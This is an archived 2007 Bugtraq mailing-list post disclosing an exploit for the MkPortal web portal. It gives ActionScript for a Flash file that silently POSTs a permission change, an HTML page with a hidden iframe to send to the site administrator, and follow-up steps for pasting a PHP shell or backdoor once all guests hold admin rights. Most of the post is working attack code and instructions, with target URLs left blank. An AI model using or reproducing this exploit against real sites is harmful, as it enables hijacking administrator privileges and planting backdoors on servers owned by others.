lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 4 Jan 2007 04:09:19 -0000
Subject: MkPortal "All Guests are Admin" Exploit

MkPortal "All Guests are Admin" Exploit

Vulnerability discovered and exploited by: Demential
E-mail: info[at]burnhead[dot]it
Mkportal website:

Start Macromedia Flash and create an swf file with this code:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("", "_self", "POST");

Translate "Save+Permissions" in MKPortal language.
Example: "Salva+questi+permessi" for italian sites.

Then upload the swf file to a webserver and create an html page like this:

<title>Put a title here</title>
<p>Put some text here<p>
<iframe src="" frameborder="0" height="0" width="0"></iframe>

Now send the html page to MKPortal administrator.
When admin opens the page all guests will be able to administrate MKPortal.

So you can go here:
and paste a php shell or a backdoor.
You can find your shell here:*.php
where * is the ID of the page.

Translate "page" in MKPortal language.
Example: "pagina" for italian sites.

Powered by blists - more mailing lists